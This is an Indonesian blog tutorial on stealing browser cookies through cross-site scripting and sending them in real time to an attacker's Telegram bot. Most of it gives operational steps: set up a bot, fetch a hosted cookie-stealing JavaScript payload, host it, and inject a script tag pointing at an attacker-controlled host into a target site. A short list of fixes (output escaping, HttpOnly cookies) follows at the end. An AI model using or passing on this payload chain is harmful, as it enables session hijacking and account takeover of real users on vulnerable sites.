Mencuri Cookie Dengan Xss via Telegram

  • Deviant Design Merupakan Layanan Jasa Desain dan Social Media Management Yang Mempunyai Pusat Di Jember. Dengan layanan yang murah, cepat dan pastinya dengan kualitas kelas atas. Mampu mengatur segala kebutuhanmu dalam mengelola social media.
Xss adalah Most common vulnerability atau kerentanan yang paling sering kita jumpai. Beberapa developer menganggap bug semacam ini sebagai bug dengan sekala kecil yang dampaknya tidak seberapa. Pada kenyataannya asumsi bahwa xss adalah bug dengan skala kecil dapat saya benarkan, pasalnya tidak semua xss dapat digunakan untuk mencuri cookie, walaupun begitu sebagai developer yang baik kita tidak boleh mengganggap sepele suatu bug karena bisa saja bug yang kecil ini memicu chaining effect yang mengakibatkan kerentanan yang lebih besar.

Pada kali ini saya akan membahas bagaimana cara mencuri cookie dengan telegram. Tujuannya adalah mendapatkan cookie secara realtime.

Pertama Siapkan Bot Telegramnya
1.Buka Telegram anda
2.Klik icon cari di pojok kanan atas
3.Cari Telegram @BotFather
4.Tulis /start atau klik start
5.Tulis Nama Bot Kalian. Contoh BotAdeGanteng
6.Tulis username bot. Contoh Adeganteng_bot
7.Anda akan mendapat Token Bot
Kedua Cari Chat ID
1.Buka Telegram anda
2.Klik icon cari di pojok kanan atas
3.Cari Telegram @get_id_bot
4.Tulis /start atau klik start
5.Anda akan dapat Chat ID
Ketiga Konfigurasikan Chat ID dan Token Bot Pada JS Payload
1.Download Payload Di https://raw.githubusercontent.com/Adelittle/TeleXA/master/telexa.js
2.Isikan Token Bot pada  var tokenBot dan Chat ID pada var chatId
3.Upload Js payload pada web anda
4.Masukkan Xss Pada Target dengan payload

"><script src="http://webanda.co/telexa.js"></script>

Hasil

Beberapa cara memperbaiki celah xss adalah sebagai berikut:
-Menggunakan htmlspesialchars
-Menggunakan htmlentities
-Memasang Header X-Xss-Protection
-Menerapkan cookie http Only

Kesimpulan
Cookie dapat digunakan untuk mengambil sesi user pada sebuah web apps, paduan antara exploit xss dan telegram daoat membuat kegiatan stealing cookie lebih realtime, yang mana artinya cookie bisa didapatkan sebelum kedaluarsa. Baik sebagai user ataupun programmer sebaiknya memperhatikan url yang diberikan dan mengevaluasi beberapa fitur pada webnya. Walaupun xss dikenaln sebagai coomon vulnerability tapi dampak yang dihasilkan perlu diperhitungkan

Mungkin itu saja untuk artikel kali ini, jika ada yang kurang dipahami atau ingin bertanya silahkan menghubungi kami via fanspage.
Terimakasih dan semoga bermanfaat :)

Artikel Terbaru